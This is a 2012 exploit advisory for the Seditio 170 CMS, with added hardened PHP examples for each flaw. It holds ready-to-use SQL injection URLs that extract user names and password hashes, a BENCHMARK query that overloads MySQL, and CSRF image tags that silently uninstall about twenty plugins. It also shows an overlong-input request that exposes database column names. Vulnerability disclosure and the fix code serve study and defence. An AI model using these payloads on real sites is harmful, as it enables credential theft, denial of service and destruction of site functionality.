Seditio 170 Cross Site Request Forgery / SQL Injection

Posted Apr 12, 2012
Authored by Akastep

Seditio version 170 suffers from cross site request forgery and remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, sql injection, csrf
MD5 | be042b5fe3b90a4be8b6026f48657ab0

============================================================
Vulnerable Software: Seditio 170 (seditio-build170.20120302)
Downloaded from: http://www.neocrome.net/files/code/seditio-build170.20120302.rar
(MD5 SUM: beb6adc6abb56f947698c1efdbae9430 *seditio-build170.20120302.rar)
============================================================
Tested:
*php.ini MAGIC_QUOTES_GPC OFF*
Safe mode off
/*
OS: Windows XP SP2 (32 bit)
Apache: 2.2.21.0
PHP Version: 5.2.17.17
mysql> select version()
-> ;
+-----------+
| version() |
+-----------+
| 5.5.21 |
+-----------+
*/
===========================================================
Vuln Desc:
Seditio 170 (seditio-build170.20120302) is prone to an SQL injection vulnerability.
Note: *successful exploitation requires administrative authentication to the system.*


//system/core/admin/admin.hits.inc.php
//Vulnerable Code Section
// $f and $v are read straight from the query string ('G'); the test above
// (magic_quotes_gpc off) shows a single quote in $v reaches the query unchanged.
$f = sed_import('f','G','TXT');
$v = sed_import('v','G','TXT');

if ($f=='year' || $f=='month')
{
    $adminpath[] = array ("admin.php?m=hits&f=".$f."&v=".$v, "(".$v.")");
    // Injection sink: $v is interpolated directly into the LIKE pattern.
    $sql = sed_sql_query("SELECT * FROM $db_stats WHERE stat_name LIKE '$v%' ORDER BY stat_name DESC");
    // (remainder of the block is not shown in the advisory)
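The hardened shape of the filter above, as an added example that is not Seditio's own code: the filter name is allow-listed, the value must match the expected prefix format, and the LIKE pattern is bound as a parameter instead of being interpolated. The year/year-month format of stat_name, the helper names, and the table name sed170_stats are assumptions made for this example.

```php
<?php
// Added example (not Seditio's code): hardened replacement for the
// admin.hits.inc.php filter. Assumes stat_name values start with a year
// ("2012") or a year-month ("2012-04"); that format is an assumption here.

declare(strict_types=1);

// Allow-list the filter name and pin the value to the expected shape.
// Anything else is rejected instead of being echoed into links and SQL.
function validateHitsFilter(string $f, string $v): ?string
{
    $patterns = [
        'year'  => '/^\d{4}$/',
        'month' => '/^\d{4}-\d{2}$/',
    ];
    if (!isset($patterns[$f])) {
        return null;
    }
    return preg_match($patterns[$f], $v) === 1 ? $v : null;
}

// Escape LIKE metacharacters so a bound value can never widen the match
// (MySQL's default LIKE escape character is the backslash).
function escapeLikePrefix(string $prefix): string
{
    return strtr($prefix, ['\\' => '\\\\', '%' => '\\%', '_' => '\\_']);
}

// Build the statement with a placeholder rather than string interpolation.
// $statsTable comes from configuration, never from the request. The SQL text
// and parameter list are returned separately so a caller can hand them to
// mysqli_stmt::bind_param or PDOStatement::execute.
function buildHitsQuery(string $statsTable, string $prefix): array
{
    $sql = "SELECT * FROM $statsTable WHERE stat_name LIKE ? ORDER BY stat_name DESC";
    return [$sql, [escapeLikePrefix($prefix) . '%']];
}

// Constructed inputs: a legitimate filter, a value carrying a quote, and an
// unknown filter name. Only the first one produces a query.
$requests = [
    ['f' => 'year',  'v' => '2012'],
    ['f' => 'year',  'v' => "1' or'1'!='1--"],
    ['f' => 'stat',  'v' => '2012'],
];

foreach ($requests as $r) {
    $prefix = validateHitsFilter($r['f'], $r['v']);
    if ($prefix === null) {
        echo "rejected: f={$r['f']}\n";
        continue;
    }
    [$sql, $params] = buildHitsQuery('sed170_stats', $prefix);
    echo $sql, ' -- params: ', json_encode($params), "\n";
}
```

Validation and parameter binding are deliberately both present: the allow-list keeps junk out of the admin breadcrumb link in $adminpath, and the bound parameter makes the query safe even if the validation pattern is later loosened.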


Exploit:
Extract user(s)/admin(s)/moder(s) details:
http://192.168.0.15/learn/128/sed/seditio.170/admin.php?m=hits&f=year&v=1%27%20union%20select%201,user_name%20from%20sed170_users%20limit%201--%20or%271%27!=%271--

http://192.168.0.15/learn/128/sed/seditio.170/admin.php?m=hits&f=year&v=1%27%20union%20select%201,concat%28user_name,0x3a,user_password%29%20from%20sed170_users%20where%20user_id=1--%20or%271%27!=%271--

http://192.168.0.15/learn/128/sed/seditio.170/admin.php?m=hits&f=year&v=1%27%20union%20select%201,concat%28user_name,0x3a,user_password%29%20from%20sed170_users--%20or%271%27!=%271--

http://192.168.0.15/learn/128/sed/seditio.170/admin.php?m=hits&f=year&v=1%27%20union%20select%201,concat%28user_name,0x3a,user_password%29%20from%20sed170_users%20where%20user_id=1--%20or%271%27!=%271--


Overload the MySQL server (as a result the MySQL server goes down with high CPU load; in other words, a denial of service through SQL injection):
http://192.168.0.15/learn/128/sed/seditio.170/admin.php?m=hits&f=year&v=1%27%20or%20%28select%20benchmark%28100000000000000000,sha1%28md5%28now%28%29%29%29%29%29%20or%271%27!=%271--
Note: it can be combined with CSRF, especially if you have no admin access to the system.
For example:
<img src="http://192.168.0.15/learn/128/sed/seditio.170/admin.php?m=hits&f=year&v=1%27%20or%20%28select%20benchmark%28100000000000000000,sha1%28md5%28now%28%29%29%29%29%29%20or%271%27!=%271--" />

Screenshot:
http://s019.radikal.ru/i625/1204/6d/842088135393.png




Seditio 170 (seditio-build170.20120302) is also prone to a CSRF (Cross Site Request Forgery)
vulnerability because it does not validate requests that arrive via $_GET,
and as a result plugins can be silently uninstalled/stopped/paused/started, which may cause
data loss or loss of functionality.
===========================================================================================
/*Tested with Seditio 165/seditio-build170.20120302 versions [Uninstall Plugins] CSRF exploit.*/
//Works for me.
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=Highslide_iResizer&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=adminqv&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=cleaner&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=contact&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=forumstats&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=gallery&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=ipsearch&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=massmovetopics&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=news&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=passrecover&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=recentitems&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=search&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=skineditor&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=statistics&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=textboxer2&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=dbtools&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=pmoku&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=modcp&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=guestbook&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=pmblocker_se&b=uninstall" />
==============================================================================================
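One way to close the plugin-action CSRF hole above, as an added example that is not Seditio's own code: state-changing admin actions are moved from GET links to POST forms that carry a per-session token, and the handler refuses anything else. The function names and the simulated $session array are this example's own; a real handler would use $_SESSION and $_SERVER['REQUEST_METHOD'].

```php
<?php
// Added example (not Seditio's code): per-session CSRF token for
// state-changing admin actions such as plugin uninstall.

declare(strict_types=1);

// Issue a random token once per session and keep it server-side.
function csrfToken(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// A state-changing action must arrive by POST and carry a token equal to the
// session copy; hash_equals keeps the comparison constant-time.
function csrfRequestIsValid(array $session, string $method, array $post): bool
{
    if ($method !== 'POST') {
        return false;
    }
    if (empty($session['csrf_token']) || !isset($post['csrf_token'])) {
        return false;
    }
    return hash_equals($session['csrf_token'], (string) $post['csrf_token']);
}

// Render the uninstall control as a form rather than a GET link, so a bare
// <img src="..."> on a third-party page can no longer trigger it.
function renderUninstallForm(array &$session, string $pluginName): string
{
    $token  = htmlspecialchars(csrfToken($session), ENT_QUOTES, 'UTF-8');
    $plugin = htmlspecialchars($pluginName, ENT_QUOTES, 'UTF-8');
    return "<form method=\"post\" action=\"admin.php?m=plug&amp;a=edit\">\n"
         . "  <input type=\"hidden\" name=\"pl\" value=\"$plugin\" />\n"
         . "  <input type=\"hidden\" name=\"b\" value=\"uninstall\" />\n"
         . "  <input type=\"hidden\" name=\"csrf_token\" value=\"$token\" />\n"
         . "  <button type=\"submit\">Uninstall</button>\n"
         . "</form>\n";
}

// Simulated session and requests (constructed for this example).
$session = [];
echo renderUninstallForm($session, 'guestbook');

$forged = csrfRequestIsValid($session, 'GET', []);                                        // the <img> request
$legit  = csrfRequestIsValid($session, 'POST', ['csrf_token' => $session['csrf_token']]); // real form submit
$wrong  = csrfRequestIsValid($session, 'POST', ['csrf_token' => str_repeat('0', 64)]);   // guessed token
var_dump($forged, $legit, $wrong); // bool(false) bool(true) bool(false)
```

Requiring POST on its own is not enough (a hidden auto-submitting form on an attacker page posts just as easily as an image tag fetches), which is why the token check is the part that actually decides.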



Information Disclosure:

Post a very long string into the form inputs.

The application exposes database column names, which is not acceptable from a security standpoint.

For example, the client-side validation:
<tr>
<td>Location:</td>
<td><input type="text" class="text" name="ruserlocation" value="" size="32" maxlength="64" /></td>
</tr>

http://192.168.0.15/learn/128/sed/seditio.170/users.php?m=profile&a=update&x=EONODP
Post data:
userid=1&curpassword=&ruserhideemail=1&ruserpmnotify=0&ruserskin=artic&ruserlang=en&rusercountry=00&ruserlocation=aaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&rusertimezone=-12&ruserwebsite=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&
ryear=0&rmonth=0&rday=0&ruseroccupation=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&rusergender=U&MAX_FILE_SIZE=65536000&userfile=&rusertext=&rnewpass1=&rnewpass2=&x=EONODP



Error:
Title of your site
2012-04-12 04:55 / Fatal error : SQL error : Data too long for column 'user_occupation' at row 1
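The missing server-side counterpart of that maxlength, as an added example that is not Seditio's own code: each profile field is checked against its limit before any query runs, the precise reason is written to the server log, and the client only sees a generic message. The limit for ruserlocation (64) is the one the form declares; the other limits, the function names, and the sample inputs are assumptions for this example.

```php
<?php
// Added example (not Seditio's code): server-side length limits for profile
// fields plus a generic client-facing error. Requires the mbstring extension.

declare(strict_types=1);

// Field limits: ruserlocation mirrors the form's maxlength="64";
// the other two values are assumed for this example.
const PROFILE_FIELD_LIMITS = [
    'ruserlocation'   => 64,
    'ruserwebsite'    => 255,
    'ruseroccupation' => 64,
];

// Returns the names of fields that exceed their limit; an empty list is valid.
function overlongProfileFields(array $post): array
{
    $bad = [];
    foreach (PROFILE_FIELD_LIMITS as $field => $limit) {
        if (isset($post[$field]) && mb_strlen((string) $post[$field], 'UTF-8') > $limit) {
            $bad[] = $field;
        }
    }
    return $bad;
}

// Keep diagnostics and user-visible text apart: the exact reason goes to the
// log callback, the response carries only a generic message. The same split
// applies to database errors, which should be logged, never echoed.
function handleProfileUpdate(array $post, callable $log): array
{
    $bad = overlongProfileFields($post);
    if ($bad !== []) {
        $log('profile update rejected, over-long fields: ' . implode(',', $bad));
        return ['ok' => false, 'message' => 'One or more fields are too long.'];
    }
    return ['ok' => true, 'message' => 'Profile updated.'];
}

// Constructed inputs: a normal update and one with an over-long occupation.
$log = static function (string $line): void {
    fwrite(STDERR, $line . "\n");
};
print_r(handleProfileUpdate(['ruserlocation' => 'Baku', 'ruseroccupation' => 'tester'], $log));
print_r(handleProfileUpdate(['ruseroccupation' => str_repeat('A', 900)], $log));
```

Checking length in characters rather than bytes matters when the column is defined in characters; if the schema limit is in bytes (older MySQL charsets), compare strlen() against it instead.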



Persistent Cross Site Scripting vulnerability still unfixed (from Seditio 161).
Same info/path disclosures still unfixed (from Seditio 161).
("Thanks" to the TinyMCE editor and thanks to client-side validation) (from Seditio 161)
I notified about it here and to the vendor too, but it is still unfixed in 170.20120302.
====================PLEASE==HELP TO KEEP SEDITIO SECURE=================================


+++++++Greetz to all++++++++++
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com and
to all AA Team.
++++++++++++++++++++++++++++++
Thank you.

/AkaStep ^_^

